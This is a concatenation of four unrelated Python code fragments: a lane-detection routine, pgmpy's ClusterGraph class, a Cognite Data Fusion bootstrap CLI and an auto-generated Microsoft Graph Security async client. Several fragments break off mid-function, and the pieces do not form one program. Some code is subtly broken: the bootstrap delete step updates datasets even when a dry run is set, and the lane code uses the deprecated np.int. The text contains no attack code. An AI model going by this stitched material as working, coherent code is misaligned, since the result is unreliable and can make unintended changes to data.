(nonzerox >= win_xright_low) & (nonzerox < win_xright_high)).nonzero()[0]
# Append these indices to the lists
left_lane_inds.append(good_left_inds)
right_lane_inds.append(good_right_inds)
# If you found > minpix pixels, recenter next window on their mean position
if len(good_left_inds) > minpix:
leftx_current = np.int(np.mean(nonzerox[good_left_inds]))
if len(good_right_inds) > minpix:
rightx_current = np.int(np.mean(nonzerox[good_right_inds]))
# Concatenate the arrays of indices
left_lane_inds = np.concatenate(left_lane_inds)
right_lane_inds = np.concatenate(right_lane_inds)
# Extract left and right line pixel positions
leftx = nonzerox[left_lane_inds]
lefty = nonzeroy[left_lane_inds]
rightx = nonzerox[right_lane_inds]
righty = nonzeroy[right_lane_inds]
# Fit a second order polynomial to each
left_fit = np.polyfit(lefty, leftx, 2)
right_fit = np.polyfit(righty, rightx, 2)
# Generate x and y values for plotting
ploty = np.linspace(0, binary_warped.shape[0] - 1, binary_warped.shape[0])
left_fitx = left_fit[0] * ploty ** 2 + left_fit[1] * ploty + left_fit[2]
right_fitx = right_fit[0] * ploty ** 2 + right_fit[1] * ploty + right_fit[2]
out_img[nonzeroy[left_lane_inds], nonzerox[left_lane_inds]] = [255, 0, 0]
out_img[nonzeroy[right_lane_inds], nonzerox[right_lane_inds]] = [0, 0, 255]
#plt.imshow(out_img)
#plt.plot(left_fitx, ploty, color='yellow')
#plt.plot(right_fitx, ploty, color='yellow')
#plt.xlim(0, 1280)
#plt.ylim(720, 0)
# Assume you now have a new warped binary image
# from the next frame of video (also called "binary_warped")
# It's now much easier to find line pixels!
nonzero = binary_warped.nonzero()
nonzeroy = np.array(nonzero[0])
nonzerox = np.array(nonzero[1])
margin = 100
left_lane_inds = ((nonzerox > (left_fit[0] * (nonzeroy ** 2) + left_fit[1] * nonzeroy +
left_fit[2] - margin)) & (nonzerox < (left_fit[0] * (nonzeroy ** 2) +
left_fit[1] * nonzeroy + left_fit[
2] + margin)))
right_lane_inds = ((nonzerox > (right_fit[0] * (nonzeroy ** 2) + right_fit[1] * nonzeroy +
right_fit[2] - margin)) & (nonzerox < (right_fit[0] * (nonzeroy ** 2) +
right_fit[1] * nonzeroy + right_fit[
2] + margin)))
# Again, extract left and right line pixel positions
leftx = nonzerox[left_lane_inds]
lefty = nonzeroy[left_lane_inds]
rightx = nonzerox[right_lane_inds]
righty = nonzeroy[right_lane_inds]
# Fit a second order polynomial to each
left_fit = np.polyfit(lefty, leftx, 2)
right_fit = np.polyfit(righty, rightx, 2)
# Generate x and y values for plotting
ploty = np.linspace(0, binary_warped.shape[0] - 1, binary_warped.shape[0])
left_fitx = left_fit[0] * ploty ** 2 + left_fit[1] * ploty + left_fit[2]
right_fitx = right_fit[0] * ploty ** 2 + right_fit[1] * ploty + right_fit[2]
# Create an image to draw on and an image to show the selection window
out_img = np.dstack((binary_warped, binary_warped, binary_warped)) * 255
window_img = np.zeros_like(out_img)
# Color in left and right line pixels
out_img[nonzeroy[left_lane_inds], nonzerox[left_lane_inds]] = [255, 0, 0]
out_img[nonzeroy[right_lane_inds], nonzerox[right_lane_inds]] = [0, 0, 255]
# Generate a polygon to illustrate the search window area
# And recast the x and y points into usable format for cv2.fillPoly()
left_line_window1 = np.array([np.transpose(np.vstack([left_fitx - margin, ploty]))])
left_line_window2 = np.array([np.flipud(np.transpose(np.vstack([left_fitx + margin,
ploty])))])
left_line_pts = np.hstack((left_line_window1, left_line_window2))
right_line_window1 = np.array([np.transpose(np.vstack([right_fitx - margin, ploty]))])
right_line_window2 = np.array([np.flipud(np.transpose(np.vstack([right_fitx + margin,
ploty])))])
right_line_pts = np.hstack((right_line_window1, right_line_window2))
# Draw the lane onto the warped blank image
cv2.fillPoly(window_img, np.int_([left_line_pts]), (0, 255, 0))
cv2.fillPoly(window_img, np.int_([right_line_pts]), (0, 255, 0))
#result = cv2.addWeighted(out_img, 1, window_img, 0.3, 0)
#plt.imshow(result)
#plt.plot(left_fitx, ploty, color='yellow')
#plt.plot(right_fitx, ploty, color='yellow')
#plt.xlim(0, 1280)
#plt.ylim(720, 0)
#plt.show()
#plt.xlim(0, 1280)
#plt.ylim(0, 720)
#plt.plot(left_fitx, ploty, color='green', linewidth=3)
#plt.plot(right_fitx, ploty, color='green', linewidth=3)
#plt.gca().invert_yaxis() # to visualize as we do the images
#plt.show()
# Define y-value where we want radius of curvature
# I'll choose the maximum y-value, corresponding to the bottom of the image
#y_eval = np.max(ploty)
#left_curverad = ((1 + (2 * left_fit[0] * y_eval + left_fit[1]) ** 2) ** 1.5) / np.absolute(2 * left_fit[0])
#right_curverad = ((1 + (2 * right_fit[0] * y_eval + right_fit[1]) ** 2) ** 1.5) / np.absolute(2 * right_fit[0])
#print(left_curverad, right_curverad)
# Example values: 1926.74 1908.48
# Define conversions in x and y from pixels space to meters
ym_per_pix = 30 / 720 # meters per pixel in y dimension
xm_per_pix = 3.7 / 700 # meters per pixel in x dimension
# Fit new polynomials to x,y in world space
left_fit_cr = np.polyfit(ploty * ym_per_pix, left_fitx * xm_per_pix, 2)
right_fit_cr = np.polyfit(ploty * ym_per_pix, right_fitx * xm_per_pix, 2)
# Calculate the new radii of curvature
#left_curverad = ((1 + (2 * left_fit_cr[0] * y_eval * ym_per_pix + left_fit_cr[1]) ** 2) ** 1.5) / np.absolute(
# 2 * left_fit_cr[0])
#right_curverad = ((1 + (2 * right_fit_cr[0] * y_eval * ym_per_pix + right_fit_cr[1]) ** 2) ** 1.5) / np.absolute(
# 2 * right_fit_cr[0])
# Now our radius of curvature is in meters
#print(left_curverad, 'm', right_curverad, 'm')
# Example values: 632.1 m 626.2 m
# Create an image to draw the lines on
warp_zero = np.zeros_like(binary_warped).astype(np.uint8)
color_warp = np.dstack((warp_zero, warp_zero, warp_zero))
# Recast the x and y points into usable format for cv2.fillPoly()
pts_left = np.array([np.transpose(np.vstack([left_fitx, ploty]))])
pts_right = np.array([np.flipud(np.transpose(np.vstack([right_fitx, ploty])))])
pts = np.hstack((pts_left, pts_right))
# Draw the lane onto the warped blank image
cv2.fillPoly(color_warp, np.int_([pts]), (0, 255, 0))
# Warp the blank back to original image space using inverse perspective matrix (Minv)
newwarp = cv2.warpPerspective(color_warp, Minv, (img.shape[1], img.shape[0]))
# Combine the result with the original image
result = cv2.addWeighted(img, 1, newwarp, 0.3, 0)
#plt.imshow(result)
#plt.show()
return result
white_output = '../output_images/challenge_video.mp4'
## To speed up the testing process you may want to try your pipeline on a shorter subclip of the video
## To do so add .subclip(start_second,end_second) to the end of the line below
## Where start_second and end_second are integer values representing the start and end of | |
#!/usr/bin/env python3
from collections import defaultdict
import numpy as np
from pgmpy.base import UndirectedGraph
from pgmpy.factors import factor_product
class ClusterGraph(UndirectedGraph):
r"""
Base class for representing Cluster Graph.
Cluster graph is an undirected graph which is associated with a subset of variables. The graph contains undirected
edges that connects clusters whose scopes have a non-empty intersection.
Formally, a cluster graph is :math:`\mathcal{U}` for a set of factors :math:`\Phi` over :math:`\mathcal{X}` is an
undirected graph, each of whose nodes :math:`i` is associated with a subset :math:`C_i \subseteq X`. A cluster
graph must be family-preserving - each factor :math:`\phi \in \Phi` must be associated with a cluster C, denoted
:math:`\alpha(\phi)`, such that :math:`Scope[\phi] \subseteq C_i`. Each edge between a pair of clusters :math:`C_i`
and :math:`C_j` is associated with a sepset :math:`S_{i,j} \subseteq C_i \cap C_j`.
Parameters
----------
data: input graph
Data to initialize graph. If data=None (default) an empty graph is created. The data is an edge list
Examples
--------
Create an empty ClusterGraph with no nodes and no edges
>>> from pgmpy.models import ClusterGraph
>>> G = ClusterGraph()
G can be grown by adding clique nodes.
**Nodes:**
Add a tuple (or list or set) of nodes as single clique node.
>>> G.add_node(('a', 'b', 'c'))
>>> G.add_nodes_from([('a', 'b'), ('a', 'b', 'c')])
**Edges:**
G can also be grown by adding edges.
>>> G.add_edge(('a', 'b', 'c'), ('a', 'b'))
or a list of edges
>>> G.add_edges_from([(('a', 'b', 'c'), ('a', 'b')),
... (('a', 'b', 'c'), ('a', 'c'))])
"""
def __init__(self, ebunch=None):
super(ClusterGraph, self).__init__()
if ebunch:
self.add_edges_from(ebunch)
self.factors = []
def add_node(self, node, **kwargs):
"""
Add a single node to the cluster graph.
Parameters
----------
node: node
A node should be a collection of nodes forming a clique. It can be
a list, set or tuple of nodes
Examples
--------
>>> from pgmpy.models import ClusterGraph
>>> G = ClusterGraph()
>>> G.add_node(('a', 'b', 'c'))
"""
if not isinstance(node, (list, set, tuple)):
raise TypeError(
"Node can only be a list, set or tuple of nodes forming a clique"
)
node = tuple(node)
super(ClusterGraph, self).add_node(node, **kwargs)
def add_nodes_from(self, nodes, **kwargs):
"""
Add multiple nodes to the cluster graph.
Parameters
----------
nodes: iterable container
A container of nodes (list, dict, set, etc.).
Examples
--------
>>> from pgmpy.models import ClusterGraph
>>> G = ClusterGraph()
>>> G.add_nodes_from([('a', 'b'), ('a', 'b', 'c')])
"""
for node in nodes:
self.add_node(node, **kwargs)
def add_edge(self, u, v, **kwargs):
"""
Add an edge between two clique nodes.
Parameters
----------
u, v: nodes
Nodes can be any list or set or tuple of nodes forming a clique.
Examples
--------
>>> from pgmpy.models import ClusterGraph
>>> G = ClusterGraph()
>>> G.add_nodes_from([('a', 'b', 'c'), ('a', 'b'), ('a', 'c')])
>>> G.add_edges_from([(('a', 'b', 'c'), ('a', 'b')),
... (('a', 'b', 'c'), ('a', 'c'))])
"""
set_u = set(u)
set_v = set(v)
if set_u.isdisjoint(set_v):
raise ValueError("No sepset found between these two edges.")
super(ClusterGraph, self).add_edge(u, v)
def add_factors(self, *factors):
"""
Associate a factor to the graph.
See factors class for the order of potential values
Parameters
----------
*factor: pgmpy.factors.factors object
A factor object on any subset of the variables of the model which
is to be associated with the model.
Returns
-------
None
Examples
--------
>>> from pgmpy.models import ClusterGraph
>>> from pgmpy.factors.discrete import DiscreteFactor
>>> student = ClusterGraph()
>>> student.add_node(('Alice', 'Bob'))
>>> factor = DiscreteFactor(['Alice', 'Bob'], cardinality=[3, 2],
... values=np.random.rand(6))
>>> student.add_factors(factor)
"""
for factor in factors:
factor_scope = set(factor.scope())
nodes = [set(node) for node in self.nodes()]
if factor_scope not in nodes:
raise ValueError(
"Factors defined on clusters of variable not" "present in model"
)
self.factors.append(factor)
def get_factors(self, node=None):
"""
Return the factors that have been added till now to the graph.
If node is not None, it would return the factor corresponding to the
given node.
Examples
--------
>>> from pgmpy.models import ClusterGraph
>>> from pgmpy.factors.discrete import DiscreteFactor
>>> G = ClusterGraph()
>>> G.add_nodes_from([('a', 'b', 'c'), ('a', 'b'), ('a', 'c')])
>>> G.add_edges_from([(('a', 'b', 'c'), ('a', 'b')),
... (('a', 'b', 'c'), ('a', 'c'))])
>>> phi1 = DiscreteFactor(['a', 'b', 'c'], [2, 2, 2], np.random.rand(8))
>>> phi2 = DiscreteFactor(['a', 'b'], [2, 2], np.random.rand(4))
>>> phi3 = DiscreteFactor(['a', 'c'], [2, 2], np.random.rand(4))
>>> G.add_factors(phi1, phi2, phi3)
>>> G.get_factors()
>>> G.get_factors(node=('a', 'b', 'c'))
"""
if node is None:
return self.factors
else:
nodes = [set(n) for n in self.nodes()]
if set(node) not in nodes:
raise ValueError("Node not present in Cluster Graph")
factors = filter(lambda x: set(x.scope()) == set(node), self.factors)
return next(factors)
def remove_factors(self, *factors):
"""
Removes the given factors from the added factors.
Examples
--------
>>> from pgmpy.models import ClusterGraph
>>> from pgmpy.factors.discrete import DiscreteFactor
>>> student = ClusterGraph()
>>> factor = DiscreteFactor(['Alice', 'Bob'], cardinality=[2, 2],
... value=np.random.rand(4))
>>> student.add_factors(factor)
>>> student.remove_factors(factor)
"""
for factor in factors:
self.factors.remove(factor)
def get_cardinality(self, node=None):
"""
Returns the cardinality of the node
Parameters
----------
node: any hashable python object (optional)
The node whose cardinality we want. If node is not specified returns a
dictionary with the given variable as keys and their respective cardinality
as values.
Returns
-------
int or dict : If node is specified returns the cardinality of the node.
If node is not specified returns a dictionary with the given
variable as keys and their respective cardinality as values.
Examples
--------
>>> from pgmpy.models import ClusterGraph
>>> from pgmpy.factors.discrete import DiscreteFactor
>>> student = ClusterGraph()
>>> factor = DiscreteFactor(['Alice', 'Bob'], cardinality=[2, 2],
... values=np.random.rand(4))
>>> student.add_node(('Alice', 'Bob'))
>>> student.add_factors(factor)
>>> student.get_cardinality()
defaultdict(<class 'int'>, {'Bob': 2, 'Alice': 2})
>>> student.get_cardinality(node='Alice')
2
"""
if node:
for factor in self.factors:
for variable, cardinality in zip(factor.scope(), factor.cardinality):
if node == variable:
return cardinality
else:
cardinalities = defaultdict(int)
for factor in self.factors:
for variable, cardinality in zip(factor.scope(), factor.cardinality):
cardinalities[variable] = cardinality
return cardinalities
def get_partition_function(self):
r"""
Returns the partition function for a given undirected graph.
A partition function is defined as
.. math:: \sum_{X}(\prod_{i=1}^{m} \phi_i)
where m is the number of factors present in the graph
and X are all the random variables present.
Examples
--------
>>> from pgmpy.models import ClusterGraph
>>> from pgmpy.factors.discrete import DiscreteFactor
>>> G = ClusterGraph()
>>> G.add_nodes_from([('a', 'b', 'c'), ('a', 'b'), ('a', 'c')])
>>> G.add_edges_from([(('a', 'b', 'c'), ('a', 'b')),
... (('a', 'b', 'c'), ('a', 'c'))])
>>> phi1 = DiscreteFactor(['a', 'b', 'c'], [2, 2, 2], np.random.rand(8))
>>> phi2 = DiscreteFactor(['a', 'b'], [2, 2], np.random.rand(4))
>>> phi3 = DiscreteFactor(['a', 'c'], [2, 2], np.random.rand(4))
>>> G.add_factors(phi1, phi2, phi3)
>>> G.get_partition_function()
"""
if self.check_model():
factor = self.factors[0]
factor = factor_product(
factor, *[self.factors[i] for i in range(1, len(self.factors))]
)
return np.sum(factor.values)
def check_model(self):
"""
Check the model for various errors. This method checks for the following
errors.
* Checks if factors are defined for all the cliques or not.
* Check for running intersection property is not done explicitly over
here as it done in the add_edges method.
* Checks if cardinality information for all the variables is availble or not. If
not it raises an error.
* Check if cardinality of random variable remains same across all the
factors.
Returns
-------
check: boolean
True if all the checks are passed
"""
for clique in self.nodes():
factors = filter(lambda x: set(x.scope()) == set(clique), self.factors)
if not any(factors):
raise ValueError("Factors for all the cliques or clusters not defined.")
cardinalities = self.get_cardinality()
if len(set((x for clique in self.nodes() for x in clique))) != len(
cardinalities
):
raise ValueError("Factors for all the variables not defined.")
for factor in self.factors:
for variable, cardinality in zip(factor.scope(), factor.cardinality):
if cardinalities[variable] != cardinality:
raise ValueError(
"Cardinality of variable {var} not matching among factors".format(
var=variable
)
)
return True
def copy(self):
"""
Returns a copy of ClusterGraph.
Returns
-------
ClusterGraph: copy of ClusterGraph
Examples
--------
>>> from pgmpy.factors.discrete import DiscreteFactor
>>> G = ClusterGraph()
>>> G.add_nodes_from([('a', 'b'), ('b', 'c')])
>>> G.add_edge(('a', 'b'), ('b', 'c'))
>>> phi1 = DiscreteFactor(['a', 'b'], [2, 2], np.random.rand(4))
>>> phi2 = DiscreteFactor(['b', 'c'], [2, 2], np.random.rand(4))
>>> G.add_factors(phi1, phi2)
>>> graph_copy = G.copy()
>>> graph_copy.factors
[<DiscreteFactor representing phi(a:2, | |
"""
NOLIMIT = -1
#
# Groups
#
groups_df = self.client.iam.groups.list(all=True).to_pandas()
available_group_columns = [
column
for column in groups_df.columns
if column in ["name", "id", "sourceId", "capabilities"]
] # fmt: skip
if groups_only:
#
# early exit
#
self.deployed = {"groups": groups_df[available_group_columns]}
return
#
# Data Sets
#
datasets_df = self.client.data_sets.list(limit=NOLIMIT).to_pandas()
if len(datasets_df) == 0:
# create an empty dataframe with columns, as SDK responded with no columns
datasets_df = pd.DataFrame(columns=["name", "id"])
else:
datasets_df = datasets_df[["name", "id"]]
#
# RAW DBs
#
rawdbs_df = self.client.raw.databases.list(limit=NOLIMIT).to_pandas()
if len(rawdbs_df) == 0:
# create an empty dataframe with columns, as SDK responded with no columns
rawdbs_df = pd.DataFrame(columns=["name"])
else:
rawdbs_df = rawdbs_df[["name"]]
# store DataFrames
# deployed: Dict[str, pd.DataFrame]
self.deployed = {
"groups": groups_df[available_group_columns],
"datasets": datasets_df,
"raw_dbs": rawdbs_df,
}
# prepare a yaml for "delete" job
def dump_delete_template_to_yaml(self) -> None:
# and reload again now with latest group config too
time.sleep(5) # wait for groups to be created!
self.load_deployed_config_from_cdf()
delete_template = yaml.dump(
{
"delete_or_deprecate": {
"raw_dbs": [],
"datasets": [],
"groups": [],
},
"latest_deployment": {
"raw_dbs": sorted(self.deployed["raw_dbs"].sort_values(["name"])["name"].tolist()),
# fillna('') because dataset names can be empty (NaN value)
"datasets": sorted(self.deployed["datasets"].fillna("").sort_values(["name"])["name"].tolist()),
# fillna('') because group names can be empty (NaN value)
"groups": sorted(self.deployed["groups"].fillna("").sort_values(["name"])["name"].tolist()),
},
# TODO: 220509 pa: this dict cannot support (possible) duplicate dataset names
# and why is this dumped anyway? Is this just for info?
"dataset_ids": {
row["name"]: row["id"] for i, row in sorted(self.deployed["datasets"][["name", "id"]].iterrows())
},
}
)
_logger.info(f"Delete template:\n{delete_template}")
# return delete_template
"""
### create / delete
* new in config
* delete removed from config
"""
def dry_run(self, dry_run: YesNoType) -> T_BootstrapCore:
self.is_dry_run = dry_run == YesNoType.yes
# return self for command chaining
return self
# '''
# oo.ooooo. oooo d8b .ooooo. oo.ooooo. .oooo. oooo d8b .ooooo.
# 888' `88b `888""8P d88' `88b 888' `88b `P )88b `888""8P d88' `88b
# 888 888 888 888ooo888 888 888 .oP"888 888 888ooo888
# 888 888 888 888 .o 888 888 d8( 888 888 888 .o
# 888bod8P' d888b `Y8bod8P' 888bod8P' `Y888""8o d888b `Y8bod8P'
# 888 888
# o888o o888o
# '''
def prepare(self, idp_source_id: str) -> None:
group_name = "cdf:bootstrap"
# group_name = f"{create_config.environment}:bootstrap"
group_capabilities = [
{"datasetsAcl": {"actions": ["READ", "WRITE", "OWNER"], "scope": {"all": {}}}},
{"rawAcl": {"actions": ["READ", "WRITE", "LIST"], "scope": {"all": {}}}},
{"groupsAcl": {"actions": ["LIST", "READ", "CREATE", "UPDATE", "DELETE"], "scope": {"all": {}}}},
{"projectsAcl": {"actions": ["READ", "UPDATE"], "scope": {"all": {}}}},
]
# TODO: replace with dataclass
idp_mapping = [
# sourceId
idp_source_id,
# sourceName
f"IdP Group ID: {idp_source_id}",
]
# load deployed groups with their ids and metadata
self.load_deployed_config_from_cdf(groups_only=True)
_logger.debug(f"GROUPS in CDF:\n{self.deployed['groups']}")
# allows idempotent creates, as it cleans up old groups with same names after creation
self.create_group(group_name=group_name, group_capabilities=group_capabilities, idp_mapping=idp_mapping)
if not self.is_dry_run:
_logger.info(f"Created CDF Group {group_name}")
_logger.info("Finished CDF Project Bootstrapper in 'prepare' mode ")
# '''
# .o8 oooo .
# "888 `888 .o8
# .oooo888 .ooooo. 888 .ooooo. .o888oo .ooooo.
# d88' `888 d88' `88b 888 d88' `88b 888 d88' `88b
# 888 888 888ooo888 888 888ooo888 888 888ooo888
# 888 888 888 .o 888 888 .o 888 . 888 .o
# `Y8bod88P" `Y8bod8P' o888o `Y8bod8P' "888" `Y8bod8P'
# '''
def delete(self):
# load deployed groups, datasets, raw_dbs with their ids and metadata
self.load_deployed_config_from_cdf()
# groups
group_names = self.delete_or_deprecate["groups"]
if group_names:
delete_group_ids = self.deployed["groups"].query("name in @group_names")["id"].tolist()
if delete_group_ids:
# only delete groups which exist
_logger.info(f"DELETE groups: {group_names}")
if not self.is_dry_run:
self.client.iam.groups.delete(delete_group_ids)
else:
_logger.info(f"Groups already deleted: {group_names}")
else:
_logger.info("No Groups to delete")
# raw_dbs
raw_db_names = self.delete_or_deprecate["raw_dbs"]
if raw_db_names:
delete_raw_db_names = list(set(raw_db_names).intersection(set(self.deployed["raw_dbs"]["name"])))
if delete_raw_db_names:
# only delete dbs which exist
# print("DELETE raw_dbs recursive with tables: ", raw_db_names)
_logger.info(f"DELETE raw_dbs recursive with tables: {raw_db_names}")
if not self.is_dry_run:
self.client.raw.databases.delete(delete_raw_db_names, recursive=True)
else:
# print(f"RAW DBs already deleted: {raw_db_names}")
_logger.info(f"RAW DBs already deleted: {raw_db_names}")
else:
_logger.info("No RAW Databases to delete")
# datasets cannot be deleted by design
# deprecate/archive them by prefix name with "_DEPR_", setting
# "archive=true" and a "description" with timestamp of deprecation
dataset_names = self.delete_or_deprecate["datasets"]
if dataset_names:
# get datasets which exists by name
delete_datasets_df = self.deployed["datasets"].query("name in @dataset_names")
if not delete_datasets_df.empty:
for i, row in delete_datasets_df.iterrows():
_logger.info(f"DEPRECATE dataset: {row['name']}")
update_dataset = self.client.data_sets.retrieve(id=row["id"])
update_dataset.name = (
f"_DEPR_{update_dataset.name}"
if not update_dataset.name.startswith("_DEPR_")
else f"{update_dataset.name}"
) # don't stack the DEPR prefixes
update_dataset.description = "Deprecated {}".format(self.get_timestamp())
update_dataset.metadata = dict(update_dataset.metadata, archived=True) # or dict(a, **b)
update_dataset.external_id = f"_DEPR_{update_dataset.external_id}_[{self.get_timestamp()}]"
if self.is_dry_run:
_logger.info(f"Dry run - Deprecating dataset: <{update_dataset}>")
self.client.data_sets.update(update_dataset)
else:
_logger.info("No Datasets to archive (and mark as deprecated)")
# dump all configs to yaml, as cope/paste template for delete_or_deprecate step
self.dump_delete_template_to_yaml()
# TODO: write to file or standard output
_logger.info("Finished deleting CDF Groups, Datasets and RAW Databases")
# '''
# .o8 oooo
# "888 `888
# .oooo888 .ooooo. oo.ooooo. 888 .ooooo. oooo ooo
# d88' `888 d88' `88b 888' `88b 888 d88' `88b `88. .8'
# 888 888 888ooo888 888 888 888 888 888 `88..8'
# 888 888 888 .o 888 888 888 888 888 `888'
# `Y8bod88P" `Y8bod8P' 888bod8P' o888o `Y8bod8P' .8'
# 888 .o..P'
# o888o `Y8P'
# '''
def deploy(self, with_special_groups: YesNoType, with_raw_capability: YesNoType) -> None:
# store parameter as bool
# if provided they override configuration or defaults from yaml-config
if with_special_groups:
self.with_special_groups = with_special_groups == YesNoType.yes
if with_raw_capability:
self.with_raw_capability = with_raw_capability == YesNoType.yes
# debug new features and override with cli-parameters
_logger.info(f"From cli: {with_special_groups=} / {with_raw_capability=}")
_logger.info(f"Effective: {self.with_special_groups=} / {self.with_raw_capability=}")
# load deployed groups, datasets, raw_dbs with their ids and metadata
self.load_deployed_config_from_cdf()
_logger.debug(f"RAW_DBS in CDF:\n{self.deployed['raw_dbs']}")
_logger.debug(f"DATASETS in CDF:\n{self.deployed['datasets']}")
_logger.debug(f"GROUPS in CDF:\n{self.deployed['groups']}")
# run generate steps (only print results atm)
target_raw_dbs: List[str] = []
new_created_raw_dbs: List[str] = []
if self.with_raw_capability:
target_raw_dbs, new_created_raw_dbs = self.generate_missing_raw_dbs()
_logger.info(f"All RAW_DBS from config:\n{target_raw_dbs}")
_logger.info(f"New RAW_DBS to CDF:\n{new_created_raw_dbs}")
else:
# no RAW DBs means no access to RAW at all
# which means no 'rawAcl' capability to create
# remove it form the default types
_logger.info("Creating no RAW_DBS and no 'rawAcl' capability")
acl_default_types.remove("raw")
target_datasets, new_created_datasets = self.generate_missing_datasets()
_logger.info(f"All DATASETS from config:\n{target_datasets}")
_logger.info(f"New DATASETS to CDF:\n{new_created_datasets}")
# store all raw_dbs and datasets in scope of this configuration
self.all_scope_ctx = {
"raw": target_raw_dbs, # all raw_dbs
"datasets": target_datasets, # all datasets
}
# reload deployed configs to be used as reference for group creation
time.sleep(5) # wait for datasets and raw_dbs to be created!
self.load_deployed_config_from_cdf()
# Special CDF Groups and their aad_mappings
if with_special_groups == YesNoType.yes:
self.generate_special_groups()
# CDF Groups from configuration
self.generate_groups()
if not self.is_dry_run:
_logger.info("Created new CDF Groups")
# and reload again now with latest group config too
# dump all configs to yaml, as cope/paste template for delete_or_deprecate step
self.dump_delete_template_to_yaml()
_logger.info("Finished creating CDF Groups, Datasets and RAW Databases")
# _logger.info(f'Bootstrap Pipelines: created: {len(created)}, deleted: {len(delete_ids)}')
# '''
# .o8 o8o
# "888 `"'
# .oooo888 oooo .oooo. .oooooooo oooo d8b .oooo. ooo. .oo. .oo.
# d88' `888 `888 `P )88b 888' `88b `888""8P `P )88b `888P"Y88bP"Y88b
# 888 888 888 .oP"888 888 888 888 .oP"888 888 888 888
# 888 888 888 d8( 888 `88bod8P' 888 d8( 888 888 888 888
# `Y8bod88P" o888o `Y888""8o `8oooooo. d888b `Y888""8o o888o o888o o888o
# d" YD
# "Y88888P'
# '''
def diagram(
self,
to_markdown: YesNoType = YesNoType.no,
with_raw_capability: YesNoType = YesNoType.yes,
cdf_project: str = None,
) -> None:
"""Diagram mode used to document the given configuration as a Mermaid diagram.
Args:
to_markdown (YesNoType, optional):
- Encapsulate Mermaid diagram in Markdown syntax.
- Defaults to 'YesNoType.no'.
with_raw_capability (YesNoType, optional):
- Create RAW DBs and 'rawAcl' capability. Defaults to 'YesNoType.tes'.
cdf_project (str, optional):
- Provide the CDF Project to use for the diagram 'idp-cdf-mappings'.
Example:
# requires a 'cognite' configuration section
➟ poetry run bootstrap-cli diagram configs/config-deploy-example-v2.yml | clip.exe
# precedence over 'cognite.project' which CDF Project to diagram 'bootstrap.idp-cdf-mappings'
# making a 'cognite' section optional
➟ poetry run bootstrap-cli diagram --cdf-project shiny-dev configs/config-deploy-example-v2.yml | clip.exe
# precedence over configuration 'bootstrap.features.with-raw-capability'
➟ poetry run bootstrap-cli diagram --with-raw-capability no --cdf-project shiny-prod configs/config-deploy-example-v2.yml
""" # noqa
diagram_cdf_project | |
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete_alerts.metadata = {'url': '/Security/alerts/{alert-id}'} # type: ignore
def list_secure_score_control_profiles(
self,
orderby: Optional[List[Union[str, "models.Enum20"]]] = None,
select: Optional[List[Union[str, "models.Enum21"]]] = None,
expand: Optional[List[str]] = None,
**kwargs
) -> AsyncIterable["models.CollectionOfSecureScoreControlProfile"]:
"""Get secureScoreControlProfiles from Security.
Get secureScoreControlProfiles from Security.
:param orderby: Order items by property values.
:type orderby: list[str or ~security.models.Enum20]
:param select: Select properties to be returned.
:type select: list[str or ~security.models.Enum21]
:param expand: Expand related entities.
:type expand: list[str]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either CollectionOfSecureScoreControlProfile or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~security.models.CollectionOfSecureScoreControlProfile]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.CollectionOfSecureScoreControlProfile"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_secure_score_control_profiles.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if self._config.top is not None:
query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0)
if self._config.skip is not None:
query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0)
if self._config.search is not None:
query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str')
if self._config.filter is not None:
query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str')
if self._config.count is not None:
query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool')
if orderby is not None:
query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',')
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('CollectionOfSecureScoreControlProfile', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.odata_next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(models.OdataError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_secure_score_control_profiles.metadata = {'url': '/Security/secureScoreControlProfiles'} # type: ignore
async def create_secure_score_control_profiles(
self,
body: "models.MicrosoftGraphSecureScoreControlProfile",
**kwargs
) -> "models.MicrosoftGraphSecureScoreControlProfile":
"""Create new navigation property to secureScoreControlProfiles for Security.
Create new navigation property to secureScoreControlProfiles for Security.
:param body: New navigation property.
:type body: ~security.models.MicrosoftGraphSecureScoreControlProfile
:keyword callable cls: A custom type or function that will be passed the direct response
:return: MicrosoftGraphSecureScoreControlProfile, or the result of cls(response)
:rtype: ~security.models.MicrosoftGraphSecureScoreControlProfile
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.MicrosoftGraphSecureScoreControlProfile"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
